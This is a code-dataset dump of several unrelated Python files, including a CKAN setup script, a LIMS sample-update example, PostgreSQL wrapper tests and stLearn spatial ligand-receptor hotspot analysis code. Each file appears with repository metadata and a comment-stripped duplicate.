if 'MLA Hex Material' in bpy.data.materials:
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if cg.prop_three_ml_types:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_3_f
else:
bpy.data.materials['MLA Hex Material'].node_tree.nodes['Lens 3 f'].outputs['Value'].default_value = cg.prop_ml_type_1_f
else:
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
def three_ml_types(self, context):
cg = bpy.data.scenes[0].camera_generator
if not cg.prop_three_ml_types:
cg.prop_ml_type_2_f = cg.prop_ml_type_1_f
cg.prop_ml_type_3_f = cg.prop_ml_type_1_f
else:
if cg.prop_mla_type == 'RECT':
cg.prop_three_ml_types = False
def mla_type(self, context):
cg = bpy.data.scenes[0].camera_generator
is_hex_mla = (cg.prop_mla_type == 'HEX')
if is_hex_mla:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Hex Material']
else:
if 'Two Plane Model' in bpy.data.objects:
bpy.data.objects['Two Plane Model'].data.materials[0] = bpy.data.materials['MLA Rect Material']
ml_type_1_f(self,context)
cg.prop_three_ml_types = False
three_ml_types(self,context)
def focus_distance(self, context):
if 'MLA' in bpy.data.objects:
cg = bpy.data.scenes[0].camera_generator
sensor_position = sensor_position_for_distance(cg.prop_focus_distance / 100.0)
if sensor_position != -1.0:
cg.prop_sensor_mainlens_distance = sensor_position * 1000.0
sensor_mainlens_distance(self, context)
if 'Calibration Pattern' in bpy.data.objects:
calibration_pattern = bpy.data.objects['Calibration Pattern']
translation = mathutils.Vector((-bpy.data.scenes[0].camera_generator.prop_focus_distance / 100.0, 0.0, 0.0))
translation.rotate(calibration_pattern.rotation_euler)
calibration_pattern.location = translation | true | true |
f725e3d6c35a6ace2f3a7fec8105649f2c8fe230 | 928 | py | Python | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 7 | 2019-11-18T12:00:04.000Z | 2020-04-23T16:50:05.000Z | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 3 | 2019-12-19T17:24:14.000Z | 2019-12-30T16:37:41.000Z | setup.py | datopian/ckanext-datajson | 808b211ba50e681e3b146c76443c456262836d0f | [
"CC0-1.0"
] | 2 | 2020-01-10T07:00:08.000Z | 2020-01-11T17:17:51.000Z | from setuptools import setup, find_packages
import sys, os
version = '0.5.1'
setup(
name='ckanext-datajson',
version=version,
description="CKAN extension to generate /data.json",
long_description="""\
""",
classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='U.S. Department of Health & Human Services',
author_email='',
url='http://www.healthdata.gov',
license='Public Domain',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages=['ckanext', 'ckanext.datajson'],
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
],
entry_points=\
"""
[ckan.plugins]
datajson=ckanext.datajson.plugin:DataJsonPlugin
datajson_harvest=ckanext.datajson.harvester_datajson:DataJsonHarvester
cmsdatanav_harvest=ckanext.datajson.harvester_cmsdatanavigator:CmsDataNavigatorHarvester
""",
)
| 28.121212 | 90 | 0.755388 | from setuptools import setup, find_packages
import sys, os
version = '0.5.1'
setup(
name='ckanext-datajson',
version=version,
description="CKAN extension to generate /data.json",
long_description="""\
""",
classifiers=[],
keywords='',
author='U.S. Department of Health & Human Services',
author_email='',
url='http://www.healthdata.gov',
license='Public Domain',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
namespace_packages=['ckanext', 'ckanext.datajson'],
include_package_data=True,
zip_safe=False,
install_requires=[
],
entry_points=\
"""
[ckan.plugins]
datajson=ckanext.datajson.plugin:DataJsonPlugin
datajson_harvest=ckanext.datajson.harvester_datajson:DataJsonHarvester
cmsdatanav_harvest=ckanext.datajson.harvester_cmsdatanavigator:CmsDataNavigatorHarvester
""",
)
| true | true |
f725e4f38e778a0e50ae9528f3771e4a2929df2b | 839 | py | Python | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | null | null | null | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | 2 | 2021-03-29T07:45:41.000Z | 2021-04-07T11:07:13.000Z | examples/set_sample_name.py | Molmed/genologics | 23d80bf67f6f376d218643f470e4f59c35301503 | [
"MIT"
] | 1 | 2017-12-01T09:47:48.000Z | 2017-12-01T09:47:48.000Z | """Python interface to GenoLogics LIMS via its REST API.
Example usage: Set the name and a UDF of a sample.
Per Kraulis, Science for Life Laboratory, Stockholm, Sweden.
"""
from genologics.lims import *
# Login parameters for connecting to a LIMS instance.
from genologics.config import BASEURI, USERNAME, PASSWORD
# Create the LIMS interface instance, and check the connection and version.
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
# Get the sample with the given LIMS identifier, and output its current name.
sample = Sample(lims, id='JGR58A21')
print(sample, sample.name)
sample.name = 'Joels extra-proper sample-20'
# Set the value of one of the UDFs
sample.udf['Emmas field 2'] = 5
for key, value in list(sample.udf.items()):
print(' ', key, '=', value)
sample.put()
print('Updated sample', sample)
| 26.21875 | 77 | 0.740167 |
from genologics.lims import *
from genologics.config import BASEURI, USERNAME, PASSWORD
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
sample = Sample(lims, id='JGR58A21')
print(sample, sample.name)
sample.name = 'Joels extra-proper sample-20'
sample.udf['Emmas field 2'] = 5
for key, value in list(sample.udf.items()):
print(' ', key, '=', value)
sample.put()
print('Updated sample', sample)
| true | true |
f725e59d66a1d6603562790280eee92932029c00 | 1,337 | py | Python | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | data_preprocessing_scripts/preprocess.py | SatyaSiddharthDash/headlinegen | ec11cb4b4dd4e6dce553c787cf31670a83f1c650 | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.model_selection import train_test_split
random_state = 100
data = pd.read_csv("~/headlinegen/data/nytime_front_page.csv")
data['title'] = data['title'].apply(lambda x: ' '.join(x.split(' ')[:-5]))
lens = data["content"].apply(lambda x: len(x.split(" "))).nlargest(10)
print(
f'max_input_len = {data["content"].apply(lambda x: len(x.split(" "))).min()}')
print(
f'max_output_len = {data["title"].apply(lambda x: len(x.split(" "))).max()}')
print(lens)
# train, valid_test = train_test_split(data,
# test_size=0.2,
# random_state=random_state,
# shuffle=True)
# valid, test = train_test_split(valid_test,
# test_size=0.5,
# random_state=random_state,
# shuffle=True)
# print(train.shape, valid.shape, test.shape)
# for dataset, prefix in zip([train, valid, test], ['train', 'val', 'test']):
# for columnname, suffix in zip(['content', 'title'], ['source', 'target']):
# filename = "/Users/satyasiddharthdash/headlinegen/data/nytimes/" + prefix + '.' + suffix
# with open(filename, 'w') as outfile:
# outfile.write(dataset[columnname].str.cat(sep='\n'))
| 38.2 | 98 | 0.562453 | import pandas as pd
from sklearn.model_selection import train_test_split
random_state = 100
data = pd.read_csv("~/headlinegen/data/nytime_front_page.csv")
data['title'] = data['title'].apply(lambda x: ' '.join(x.split(' ')[:-5]))
lens = data["content"].apply(lambda x: len(x.split(" "))).nlargest(10)
print(
f'max_input_len = {data["content"].apply(lambda x: len(x.split(" "))).min()}')
print(
f'max_output_len = {data["title"].apply(lambda x: len(x.split(" "))).max()}')
print(lens)
| true | true |
f725e5b14deab24e3329989fdf04feb3afb579fb | 6,848 | py | Python | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 1 | 2019-07-20T01:43:02.000Z | 2019-07-20T01:43:02.000Z | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 5 | 2019-07-15T14:21:28.000Z | 2019-07-24T20:09:25.000Z | tests/test_pg_connect.py | ktechboston/db_utils | b6e7787be832a79fc21ec63aa0860a50871cc227 | [
"MIT"
] | 1 | 2019-06-24T02:29:55.000Z | 2019-06-24T02:29:55.000Z | import unittest
import sys
import os
import csv
import psycopg2
from pprint import pprint
sys.path.insert(0, '..')
from db_utils.pg_connect import pg_connect
config_file = 'databases.conf'
db = pg_connect('postgres', config_file)
table = 'test_table'
class test_pg_connect(unittest.TestCase):
def setUp(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
db.update_db('CREATE TABLE IF NOT EXISTS test_table(name VARCHAR);')
db.update_db('DROP TABLE IF EXISTS csv_test_table')
def tearDown(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
def test_updatedb(self):
insert1 = db.update_db('''
INSERT INTO test_table(name)
VALUES ('Mahe Drysdale')''', pprint=True)
self.assertEqual(insert1, 1)
insert2 = db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=('Ondrej Synek',),
pprint=True)
self.assertEqual(insert2, 1)
delete = db.update_db('''
DELETE FROM test_table WHERE name = 'Ondrej Synek'
''', pprint=True)
self.assertEqual(delete, 1)
def test_dicts_query(self):
val = 'new row'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''', params=(val,), pprint=False)
dicts = db.get_dicts_from_query('''
SELECT * FROM test_table
''', pprint=True)
pprint(dicts)
self.assertEqual(dicts[0].get('name'),val)
#self.assertEqual(dicts[0], dict)
def test_arr_query(self):
val = 'Damir Martin'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=(val,),
pprint=True)
arr = db.get_arr_from_query('''
SELECT * FROM test_table
''', pprint=True)
self.assertEqual(arr[1][0], val)
self.assertEqual(len(arr), 2)
self.assertEqual(type(arr), list)
def test_df_query(self):
print('testing get_df_from_query method....')
TEST_ROW = 'one test row'
db.update_db('drop table if exists test_table;', pprint=False)
db.update_db('create table if not exists test_table(name varchar);', pprint=False)
db.update_db("insert into test_table(name) values (%s)", params=(TEST_ROW,), pprint=False)
df = db.get_df_from_query('''
SELECT * FROM test_table
''', pprint=False)
self.assertEqual(df['name'][0], TEST_ROW)
def test_transaction(self):
sql_list = [
'''
DROP TABLE IF EXISTS transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('second test row')
''',
'''
DROP TABLE transaction_table
'''
]
expected_output = [-1, -1, -1, 1, 1, -1]
row_update = db.transaction(sql_list, pprint=False)
self.assertEqual(row_update, expected_output)
sql_list = [
'''
DROP TABLE if exists transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
SELECT sql_sytnax_error FORM TALBE
'''
]
self.assertRaises(Exception, db.transaction, sql_list, pprint=False)
self.assertRaises(psycopg2.errors.UndefinedTable, db.update_db, 'SELECT * FROM transaction_table', pprint=False)
def test_write_arr_to_table(self):
testArray = [
['v1','v2','v3','v4','v5'],
['a1','a2','a3','a4','a5'],
['b1','b2','b3','b4','b5'],
['c1','c2','c3','c4','c5'],
['d1','d2','d3','d4','d5']
]
tablename = 'test_table'
columns = ['column1','column2','column3','column4','column5']
db.write_arr_to_table(testArray,tablename, columns)
row_count = db.get_arr_from_query('SELECT COUNT(*) FROM test_table')
element = db.get_arr_from_query('SELECT column1 FROM test_table')
self.assertEqual(row_count[1], [5])
self.assertEqual(element[1:], [['v1'], ['a1'], ['b1'], ['c1'], ['d1']])
def test_csv_to_table(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
columnArray = None
csv_row_count = None
with open("sample.csv", "r") as f:
columnsString = f.readline()
columnsString = columnsString.replace('\n','')
columnsString = columnsString.replace('_',' ')
columnsString = columnsString.lower()
columnArray = columnsString.split(',')
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count = len(data)
column_list = db.get_arr_from_query('''
SELECT column_name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'csv_test_table'
''')
column_list = column_list[1:]
result_list = []
for c in column_list:
result_list.append(c[0].replace('_',' '))
sql_row_count = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(columnArray, result_list)
self.assertEqual(csv_row_count, sql_row_count[1][0])
def test_copy_expert(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
#dump to file
sql_dump = """COPY csv_test_table
TO STDOUT
WITH CSV HEADER"""
with open("copy_expert_dump.csv",'w+') as f:
db.copy_expert(sql_dump, f)
with open("copy_expert_dump.csv", "r") as f:
reader = csv.reader(f, delimiter = ",")
data = list(reader)
csv_row_count1 = len(data)
sql_row_count1 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(sql_row_count1[1][0]+1, csv_row_count1)
#load from file
db.update_db('TRUNCATE csv_test_table', pprint=True)
sql_load = """COPY csv_test_table
FROM STDIN
WITH CSV HEADER"""
with open('sample.csv','r') as f:
db.copy_expert(sql_load, f)
with open('sample.csv', 'r') as f:
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count2 = len(data)
sql_row_count2 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table')
self.assertEqual(csv_row_count2, sql_row_count2[1][0]+1)
unittest.main() | 28.297521 | 120 | 0.580169 | import unittest
import sys
import os
import csv
import psycopg2
from pprint import pprint
sys.path.insert(0, '..')
from db_utils.pg_connect import pg_connect
config_file = 'databases.conf'
db = pg_connect('postgres', config_file)
table = 'test_table'
class test_pg_connect(unittest.TestCase):
def setUp(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
db.update_db('CREATE TABLE IF NOT EXISTS test_table(name VARCHAR);')
db.update_db('DROP TABLE IF EXISTS csv_test_table')
def tearDown(self):
db.update_db('DROP TABLE IF EXISTS test_table;')
def test_updatedb(self):
insert1 = db.update_db('''
INSERT INTO test_table(name)
VALUES ('Mahe Drysdale')''', pprint=True)
self.assertEqual(insert1, 1)
insert2 = db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=('Ondrej Synek',),
pprint=True)
self.assertEqual(insert2, 1)
delete = db.update_db('''
DELETE FROM test_table WHERE name = 'Ondrej Synek'
''', pprint=True)
self.assertEqual(delete, 1)
def test_dicts_query(self):
val = 'new row'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''', params=(val,), pprint=False)
dicts = db.get_dicts_from_query('''
SELECT * FROM test_table
''', pprint=True)
pprint(dicts)
self.assertEqual(dicts[0].get('name'),val)
def test_arr_query(self):
val = 'Damir Martin'
db.update_db('''
INSERT INTO test_table(name) VALUES (%s)
''',
params=(val,),
pprint=True)
arr = db.get_arr_from_query('''
SELECT * FROM test_table
''', pprint=True)
self.assertEqual(arr[1][0], val)
self.assertEqual(len(arr), 2)
self.assertEqual(type(arr), list)
def test_df_query(self):
print('testing get_df_from_query method....')
TEST_ROW = 'one test row'
db.update_db('drop table if exists test_table;', pprint=False)
db.update_db('create table if not exists test_table(name varchar);', pprint=False)
db.update_db("insert into test_table(name) values (%s)", params=(TEST_ROW,), pprint=False)
df = db.get_df_from_query('''
SELECT * FROM test_table
''', pprint=False)
self.assertEqual(df['name'][0], TEST_ROW)
def test_transaction(self):
sql_list = [
'''
DROP TABLE IF EXISTS transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('second test row')
''',
'''
DROP TABLE transaction_table
'''
]
expected_output = [-1, -1, -1, 1, 1, -1]
row_update = db.transaction(sql_list, pprint=False)
self.assertEqual(row_update, expected_output)
sql_list = [
'''
DROP TABLE if exists transaction_table
''',
'''
CREATE TABLE IF NOT EXISTS transaction_table(a_col varchar(20) PRIMARY KEY)
''',
'''
INSERT INTO transaction_table(a_col) VALUES ('first test row')
''',
'''
SELECT sql_sytnax_error FORM TALBE
'''
]
self.assertRaises(Exception, db.transaction, sql_list, pprint=False)
self.assertRaises(psycopg2.errors.UndefinedTable, db.update_db, 'SELECT * FROM transaction_table', pprint=False)
def test_write_arr_to_table(self):
testArray = [
['v1','v2','v3','v4','v5'],
['a1','a2','a3','a4','a5'],
['b1','b2','b3','b4','b5'],
['c1','c2','c3','c4','c5'],
['d1','d2','d3','d4','d5']
]
tablename = 'test_table'
columns = ['column1','column2','column3','column4','column5']
db.write_arr_to_table(testArray,tablename, columns)
row_count = db.get_arr_from_query('SELECT COUNT(*) FROM test_table')
element = db.get_arr_from_query('SELECT column1 FROM test_table')
self.assertEqual(row_count[1], [5])
self.assertEqual(element[1:], [['v1'], ['a1'], ['b1'], ['c1'], ['d1']])
def test_csv_to_table(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
columnArray = None
csv_row_count = None
with open("sample.csv", "r") as f:
columnsString = f.readline()
columnsString = columnsString.replace('\n','')
columnsString = columnsString.replace('_',' ')
columnsString = columnsString.lower()
columnArray = columnsString.split(',')
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count = len(data)
column_list = db.get_arr_from_query('''
SELECT column_name
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'csv_test_table'
''')
column_list = column_list[1:]
result_list = []
for c in column_list:
result_list.append(c[0].replace('_',' '))
sql_row_count = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(columnArray, result_list)
self.assertEqual(csv_row_count, sql_row_count[1][0])
def test_copy_expert(self):
db.csv_to_table('sample.csv', 'csv_test_table', append=False)
sql_dump = """COPY csv_test_table
TO STDOUT
WITH CSV HEADER"""
with open("copy_expert_dump.csv",'w+') as f:
db.copy_expert(sql_dump, f)
with open("copy_expert_dump.csv", "r") as f:
reader = csv.reader(f, delimiter = ",")
data = list(reader)
csv_row_count1 = len(data)
sql_row_count1 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table', pprint=True)
self.assertEqual(sql_row_count1[1][0]+1, csv_row_count1)
db.update_db('TRUNCATE csv_test_table', pprint=True)
sql_load = """COPY csv_test_table
FROM STDIN
WITH CSV HEADER"""
with open('sample.csv','r') as f:
db.copy_expert(sql_load, f)
with open('sample.csv', 'r') as f:
reader = csv.reader(f, delimiter = ',')
data = list(reader)
csv_row_count2 = len(data)
sql_row_count2 = db.get_arr_from_query('SELECT COUNT(*) FROM csv_test_table')
self.assertEqual(csv_row_count2, sql_row_count2[1][0]+1)
unittest.main() | true | true |
f725e6c764dab91197ce2e121ea19b4508af987d | 8,933 | py | Python | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | null | null | null | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | null | null | null | stlearn/tools/microenv/cci/base_grouping.py | duypham2108/stLearn | 91b6bae91b29aba8b4f055bf92da13f1558ddbe8 | [
"BSD-3-Clause"
] | 1 | 2019-12-12T12:46:55.000Z | 2019-12-12T12:46:55.000Z | """ Performs LR analysis by grouping LR pairs which having hotspots across
similar tissues.
"""
from stlearn.pl import het_plot
from sklearn.cluster import DBSCAN, AgglomerativeClustering
from anndata import AnnData
from tqdm import tqdm
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
def get_hotspots(
    adata: AnnData,
    lr_scores: np.ndarray,
    lrs: np.array,
    eps: float,
    quantile=0.05,
    verbose=True,
    plot_diagnostics: bool = False,
    show_plot: bool = False,
):
    """Determine per-LR hotspots, cluster the LR pairs by hotspot overlap and
    rank them, writing all results back onto ``adata``.

    For each LR pair, progressively more stringent score cutoffs are tried and
    the one maximising spatial clustering is kept (see ``hotspot_core``).  LR
    pairs are then agglomeratively clustered on their binarised hotspot
    patterns, clusters are ordered by mean hotspot spot count, and LRs are
    ordered within each cluster.

    Parameters
    ----------
    adata: AnnData         The data object.
    lr_scores: np.ndarray  LR_pair*Spots matrix of LR scores.
    lrs: np.array          The LR pairs, in line with the rows of lr_scores.
    eps: float             The eps parameter used in DBSCAN to find clusters.
    quantile: float        Step for the candidate cutoff quantiles; 0.05 tries
                           the 0, 0.05, ..., 0.95 non-zero score quantiles.

    Returns
    -------
    None. Results are stored on ``adata``: ``uns['lr_summary']`` (ranked
    summary DataFrame), ``obsm['lr_scores']``, ``obsm['lr_hot_scores']``
    (spots*LRs, columns in summary order) and ``obsm['cluster_scores']``
    (spots*LR-clusters mean hotspot scores).
    """
    coors = adata.obs[["imagerow", "imagecol"]].values
    lr_summary, lr_hot_scores = hotspot_core(
        lr_scores, lrs, coors, eps, quantile, plot_diagnostics, adata
    )
    if plot_diagnostics and show_plot:  # Showing the diagnostic plotting #
        plt.show()
    if verbose:
        print("Clustering LRs to help with ranking/interpretation...")
    # Clustering the LR pairs to obtain a set of clusters so to order within
    # each cluster.  First fit is only used to pick a distance threshold
    # (98th percentile of merge distances), then re-fit with that cutoff.
    clusterer = AgglomerativeClustering(
        affinity="euclidean", linkage="ward", distance_threshold=10, n_clusters=None
    )
    clusterer.fit(lr_hot_scores > 0)
    dist_cutoff = np.quantile(clusterer.distances_, 0.98)
    clusterer = AgglomerativeClustering(
        affinity="euclidean",
        linkage="ward",
        distance_threshold=dist_cutoff,
        n_clusters=None,
    )
    clusters = clusterer.fit_predict(lr_hot_scores > 0)
    cluster_set = np.unique(clusters)
    if verbose:
        print("Ranking LRs...")
    # Order clusters by their mean hotspot spot count (column 2 of summary),
    # descending, so the most widespread clusters come first.
    cluster_mean_spots = []
    for cluster in cluster_set:
        cluster_bool = clusters == cluster
        cluster_mean_spots.append(np.mean(lr_summary[cluster_bool, 2]))
    cluster_order = np.argsort(-np.array(cluster_mean_spots))
    # Determining order of lrs in cluster & also overall cluster scores #
    lr_order = []
    new_clusters = []
    cluster_scores = np.zeros((adata.shape[0], len(cluster_set)))
    for i, index in enumerate(cluster_order):
        cluster = cluster_set[index]
        cluster_indices = np.where(clusters == cluster)[0]
        lr_order_ = np.argsort(-lr_summary[cluster_indices, 2])
        lr_order.extend(cluster_indices[lr_order_])
        new_clusters += [i] * len(cluster_indices)
        # Mean hotspot score per spot across the cluster's LR pairs.
        cluster_scores[:, i] = lr_hot_scores[cluster_indices, :].mean(axis=0)
    if verbose:
        print("Saving results:")
    # Re-ordering the summary & the scores into ranked order #
    lrs = lrs[lr_order]
    lr_summary = lr_summary[lr_order, :]
    lr_summary[:, 3] = new_clusters
    lr_summary = pd.DataFrame(
        lr_summary,
        index=lrs,
        columns=["spot_counts", "cutoff", "hotspot_counts", "lr_cluster"],
    )
    # Transpose so obsm matrices are spots*LRs, matching AnnData conventions.
    lr_scores = lr_scores[lr_order, :].transpose()
    lr_hot_scores = lr_hot_scores[lr_order, :].transpose()
    # Adding all this information to the AnnData #
    adata.uns["lr_summary"] = lr_summary
    adata.obsm["lr_scores"] = lr_scores
    adata.obsm["lr_hot_scores"] = lr_hot_scores
    adata.obsm["cluster_scores"] = cluster_scores
    if verbose:
        print(f"\tSummary values of lrs in adata.uns['lr_summary'].")
        print(
            f"\tMatrix of lr scores in same order as the summary in adata.obsm['lr_scores']."
        )
        print(f"\tMatrix of the hotspot scores in adata.obsm['lr_hot_scores'].")
        print(
            f"\tMatrix of the mean LR cluster scores in adata.obsm['cluster_scores']."
        )
def hotspot_core(
    lr_scores,
    lrs,
    coors,
    eps,
    quantile,
    plot_diagnostics=False,
    adata=None,
    verbose=True,
    max_score=False,
):
    """Strip background signal from per-LR score vectors.

    For each LR pair, candidate cutoffs are taken at the non-zero score
    quantiles; the spots above each cutoff are clustered in space with DBSCAN
    and the cutoff maximising ``n_clusters * mean_spot_score**2`` is kept.
    Scores below the chosen cutoff are zeroed.

    Returns
    -------
    lr_summary: (n_lrs, 4) array, columns
        [spot_counts, cutoff (or best score if ``max_score``),
         hotspot_counts, lr_cluster]; the last column is filled by the caller.
    lr_hot_scores: copy of ``lr_scores`` with sub-cutoff entries zeroed.
    """
    score_copy = lr_scores.copy()  # work on a copy; caller keeps raw scores
    quantiles = [quantile * i for i in range(int(1 / quantile))]
    # Values to return #
    lr_hot_scores = np.zeros(score_copy.shape)
    # cols: spot_counts, cutoff, hotspot_counts, lr_cluster
    lr_summary = np.zeros((score_copy.shape[0], 4))
    ### Also creating grouping lr_pairs by quantiles to plot diagnostics ###
    if plot_diagnostics:
        lr_quantiles = [(i / 6) for i in range(1, 7)][::-1]
        lr_mean_scores = np.apply_along_axis(non_zero_mean, 1, score_copy)
        lr_quant_values = np.quantile(lr_mean_scores, lr_quantiles)
        # NOTE(review): assumes each quantile value exactly matches one LR's
        # mean score; ties or float mismatches would break this -- confirm.
        quant_lrs = np.array(
            [lrs[lr_mean_scores == quant] for quant in lr_quant_values]
        )
        fig, axes = plt.subplots(6, 4, figsize=(20, 15))
    # Determining the cutoffs for hotspots #
    with tqdm(
        total=len(lrs),
        desc="Removing background lr scores...",
        bar_format="{l_bar}{bar}",
        disable=verbose == False,
    ) as pbar:
        for i, lr_ in enumerate(lrs):
            lr_score_ = score_copy[i, :]  # view: edits below mutate score_copy
            lr_summary[i, 0] = len(np.where(lr_score_ > 0)[0])  # spots with any signal
            cutoff_scores = []
            cutoffs = np.quantile(lr_score_[lr_score_ > 0], quantiles)
            for cutoff in cutoffs:
                spot_bool = lr_score_ >= cutoff
                if len(np.where(spot_bool)[0]) == 0:
                    # No spots survive this cutoff; score it zero.
                    cutoff_scores.append(0)
                    continue
                coor_ = coors[spot_bool, :]
                clusters = DBSCAN(
                    min_samples=2, eps=eps, metric="manhattan"
                ).fit_predict(coor_)
                # Reward both many spatial clusters and high surviving scores.
                score = len(np.unique(clusters)) * (np.mean(lr_score_[spot_bool])) ** 2
                cutoff_scores.append(score)
            # Cutoff point where the clustering score is maximised #
            best_cutoff = cutoffs[np.argmax(cutoff_scores)]
            if not max_score:
                lr_summary[i, 1] = best_cutoff
            else:
                lr_summary[i, 1] = cutoff_scores[np.argmax(cutoff_scores)]
            lr_score_[lr_score_ < best_cutoff] = 0
            lr_hot_scores[i, :] = lr_score_
            lr_summary[i, 2] = len(np.where(lr_score_ > 0)[0])  # surviving spots
            # Adding the diagnostic plots #
            if plot_diagnostics and lr_ in quant_lrs and type(adata) != type(None):
                add_diagnostic_plots(
                    adata,
                    i,
                    lr_,
                    quant_lrs,
                    lr_quantiles,
                    lr_scores,
                    lr_hot_scores,
                    axes,
                    cutoffs,
                    cutoff_scores,
                    best_cutoff,
                )
            pbar.update(1)
    return lr_summary, lr_hot_scores
def non_zero_mean(vals):
    """Mean of the strictly positive entries of ``vals`` (zeros are excluded)."""
    positives = vals[vals > 0]
    return positives.mean()
def add_diagnostic_plots(
    adata,
    i,
    lr_,
    quant_lrs,
    lr_quantiles,
    lr_scores,
    lr_hot_scores,
    axes,
    cutoffs,
    n_clusters,
    best_cutoff,
):
    """Adds diagnostic plots for the quantile LR pair to a figure to illustrate \
    how the cutoff is functioning.

    One figure row per quantile LR: (0) cutoff-vs-score scatter, (1) score
    distribution with the chosen cutoff, (2) spatial plot of raw scores,
    (3) spatial plot of hotspot scores.

    NOTE(review): at the call site in ``hotspot_core``, ``n_clusters``
    actually receives ``cutoff_scores`` (n_clusters * mean_score**2 per
    cutoff), not raw cluster counts -- the parameter name is misleading.
    """
    q_i = np.where(quant_lrs == lr_)[0][0]  # figure row for this LR
    # Scatter plot #
    axes[q_i][0].scatter(cutoffs, n_clusters)
    axes[q_i][0].set_title(f"n_clusts*mean_spot_score vs cutoff")
    axes[q_i][0].set_xlabel("cutoffs")
    axes[q_i][0].set_ylabel("n_clusts*mean_spot_score")
    # Distribution of scores with cutoff #
    scores_ = lr_scores[i, :]
    sb.distplot(
        scores_[scores_ > 0],
        ax=axes[q_i][1],
        hist=True,
        kde=False,
        color="red",
        norm_hist=True,
    )
    v_height = 0.5
    axes[q_i][1].vlines(best_cutoff, 0, v_height)
    axes[q_i][1].text(best_cutoff, v_height, str(round(best_cutoff, 2)))
    axes[q_i][1].set_title(f"Distrib {round(lr_quantiles[q_i], 2)}({lr_})")
    # Showing before & after filtering spots.  NOTE(review): this writes a
    # 1-D vector into adata.obsm['lr_scores'] so het_plot can render it, and
    # leaves the hot scores there afterwards -- the caller later overwrites
    # the slot with the full matrix.
    adata.obsm["lr_scores"] = scores_
    het_plot(
        adata,
        use_het="lr_scores",
        ax=axes[q_i][2],
        show_color_bar=False,
    )
    axes[q_i][2].set_title("scores")
    adata.obsm["lr_scores"] = lr_hot_scores[i, :]
    het_plot(
        adata,
        use_het="lr_scores",
        ax=axes[q_i][3],
        show_color_bar=False,
    )
    axes[q_i][3].set_title("hotspot scores")
| 33.085185 | 175 | 0.614799 |
from stlearn.pl import het_plot
from sklearn.cluster import DBSCAN, AgglomerativeClustering
from anndata import AnnData
from tqdm import tqdm
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sb
def get_hotspots(
adata: AnnData,
lr_scores: np.ndarray,
lrs: np.array,
eps: float,
quantile=0.05,
verbose=True,
plot_diagnostics: bool = False,
show_plot: bool = False,
):
